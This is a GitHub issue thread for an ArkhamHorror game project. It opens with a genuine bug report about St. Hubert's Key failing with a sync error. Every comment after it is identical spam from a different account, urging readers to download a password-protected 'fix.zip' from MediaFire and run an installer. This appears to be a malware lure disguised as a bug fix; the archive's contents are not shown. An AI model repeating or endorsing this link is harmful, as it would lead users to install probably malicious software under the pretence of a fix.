### ISSUE TITLE
St. Hubert's Key, cannot trigger reaction

### ISSUE THREAD

**Issue by mmartinsky** [halogenandtoast/ArkhamHorror#442]
**Provide a Game ID**
ab7b0e13-af80-4411-bf33-7fdb89adcd9d

**Describe the bug**
St. Hubert's Key reaction is to discard itself and restore 2 sanity when you would be defeated by horror. Clicking reaction trigger just shows a "cannot sync with server" and does not proceed

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
